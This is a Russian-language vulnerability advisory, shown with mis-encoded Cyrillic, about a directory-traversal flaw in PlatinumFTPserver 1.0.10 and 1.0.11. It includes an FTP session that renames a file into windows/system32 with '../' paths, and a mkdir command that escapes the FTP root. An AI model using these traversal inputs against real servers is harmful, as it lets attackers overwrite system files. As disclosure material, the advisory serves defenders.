»зменение произвольных файлов в PlatinumFTPserver

ƒата публикации:
28.02.2003
¬сего просмотров:
697
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: ”€звимость обнаружена в PlatinumFTPserver. ”даленный авторизованный пользователь, включа€ анонимного пользовател€, может просматривать и замен€ть файлы на сервере, которые расположены вне FTP каталога.

—ообщаетс€, что удаленный заверенный пользователь может заменить любые файлы на системе (если у него есть права на загрузку файлов на FTP сервер). ѕример:

ftp> rename cmd3.exe
To name ../../../../windows/system32/cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe

ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
ftp>
“акже сообщаетс€, что удаленный авторизованный пользователь может создать каталог на целевом сервере, который расположен вне FTP root каталога, следующей командой:
 mkdir ../testing1
”€звимость обнаружена в PlatinumFTPserver 1.0.10, 1.0.11

—сылки: Vulnerability for Platinum FTP version 1.0.11
или введите им€

CAPTCHA